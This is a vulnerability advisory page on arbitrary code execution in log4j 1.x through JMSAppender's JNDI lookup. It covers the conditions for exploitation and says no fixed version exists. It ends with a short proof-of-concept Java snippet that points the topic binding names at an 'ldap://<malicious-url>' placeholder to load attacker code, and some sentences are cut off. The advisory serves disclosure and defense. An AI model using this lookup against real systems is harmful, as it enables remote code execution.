Proof of concept
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.Test your applications
13 Dec 2021
10 Dec 2021
How to fix?
There is no fixed version for
log4j 1.x is End-of-Life, and a fixed version will not be released.
If you believe your application meets the conditions mentioned in the advisory, consider upgrading to the latest log4j 2.x version, or block user input from reaching
log4j:log4j is a 1.x branch of the Apache Log4j project.
Affected versions of this package are vulnerable to Arbitrary Code Execution.
Note: Even though this vulnerability appears to be related to the log4j 2.x vulnerability, the 1.x branch of the module requires an attacker to have access to modify configurations to be exploitable, which is rarely possible.
In order to leverage this vulnerability the following conditions must be met:
- The application has enabled
JMSAppender(or a class that extends
- The attacker has access to directly modify the
TopicConnectionFactoryBindingNameconfiguration variables - which is an unlikely scenario
If these conditions are met, log4j 1.x allows a
lookup feature that does not protect against attacker-controlled LDAP and other JNDI related endpoints. Therefore, an attacker with access to the aforementioned configuration variables is able to execute arbitrary code when loaded from an LDAP server.
import org.apache.log4j.net.JMSAppender; // ... JMSAppender a = new JMSAppender(); a.setTopicConnectionFactoryBindingName("ldap://<malicious-url>"); // OR a.setTopicBindingName("ldap://<malicious-url>"); a.activateOptions();